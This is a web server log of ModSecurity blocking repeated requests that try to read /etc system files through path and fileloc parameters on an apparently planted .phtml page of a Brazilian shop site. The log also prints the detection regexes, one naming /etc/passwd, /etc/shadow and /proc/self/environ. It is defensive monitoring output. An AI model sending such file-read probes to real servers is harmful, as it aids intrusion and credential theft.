[Fri Mar 20 06:15:56.165741 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.92:56606] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QS11pVZ5mVmJwsFMbrQAAAFQ"]
[Fri Mar 20 06:15:56.165829 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.93:56604] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSzJ3M9BSuKP7CAYDPQAAAIg"]
[Fri Mar 20 06:15:57.740223 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.70:56634] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTbninkcc-iUj5ApKBAAAA5c"]
[Fri Mar 20 06:15:57.744187 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.107:56596] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSvXLqtnMIWvjpaKF2AAAAoE"]
[Fri Mar 20 06:15:57.744359 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.56:56608] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QS-oXxyEfFpUF8f9tQAAAAU8"]
[Fri Mar 20 06:15:57.744470 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.47:56610] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTPqxLDW4GITHUkTRJwAAAQ4"]
[Fri Mar 20 06:15:57.745299 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.76:56624] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTPqxLDW4GITHUkTRKQAAARc"]
[Fri Mar 20 06:15:57.745429 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.96:56600] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QS_XLqtnMIWvjpaKF2QAAApA"]
[Fri Mar 20 06:15:57.746396 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.83:56626] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTTJ3M9BSuKP7CAYDPgAAAJA"]
[Fri Mar 20 06:15:57.751065 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.111:56630] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTTJ3M9BSuKP7CAYDPwAAAIY"]
[Fri Mar 20 06:15:58.432847 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.11:56654] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTvqxLDW4GITHUkTRKgAAARg"]
[Fri Mar 20 06:15:58.575967 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.19:56656] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTta6ubjKNq_cu4a9_wAAA0Y"]
[Fri Mar 20 06:15:58.983464 2026] [:error] [pid 31215:tid 140411733534464] [client 57.141.18.41:56662] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QTgF0L0L-SsrnPo5TWAAAAsE"]
[Fri Mar 20 06:15:59.749341 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.28:56680] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QT11pVZ5mVmJwsFMbrwAAAEA"]
[Fri Mar 20 06:16:01.420166 2026] [:error] [pid 11642:tid 140411565680384] [client 57.141.18.81:56682] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QULninkcc-iUj5ApKBQAAA5U"]
[Fri Mar 20 06:16:01.424080 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.36:56692] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUfqxLDW4GITHUkTRKwAAARI"]
[Fri Mar 20 06:16:01.427282 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.89:56684] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUBCii7xarUs8iHZTygAAAg4"]
[Fri Mar 20 06:16:01.447528 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.48:56688] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUOoXxyEfFpUF8f9tRAAAAVM"]
[Fri Mar 20 06:16:01.465652 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.28:56686] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QULninkcc-iUj5ApKBgAAA5M"]
[Fri Mar 20 06:16:01.552181 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.42:56708] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUQF0L0L-SsrnPo5TWgAAAsg"]
[Fri Mar 20 06:16:02.186832 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.54:56714] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUvHIg5MgXLBnicPlZwAAAcE"]
[Fri Mar 20 06:16:02.262376 2026] [:error] [pid 21219:tid 140411683178240] [client 57.141.18.22:56716] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUvXLqtnMIWvjpaKF3gAAAoc"]
[Fri Mar 20 06:16:02.995166 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.16:56724] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QUhCii7xarUs8iHZTywAAAgw"]
[Fri Mar 20 06:16:03.276714 2026] [:error] [pid 11167:tid 140411691570944] [client 57.141.18.72:56730] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QU_HIg5MgXLBnicPlaAAAAcY"]
[Fri Mar 20 06:16:03.738601 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.89:56740] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QU11pVZ5mVmJwsFMbsQAAAFM"]
[Fri Mar 20 06:16:03.883411 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.3:56744] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QU9a6ubjKNq_cu4a-AQAAA0g"]
[Fri Mar 20 06:16:04.192379 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.41:56754] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVAF0L0L-SsrnPo5TXAAAAs4"]
[Fri Mar 20 06:16:04.442785 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.3:56690] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVPXLqtnMIWvjpaKF4gAAAog"]
[Fri Mar 20 06:16:04.708710 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.122:56768] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVLninkcc-iUj5ApKBwAAA40"]
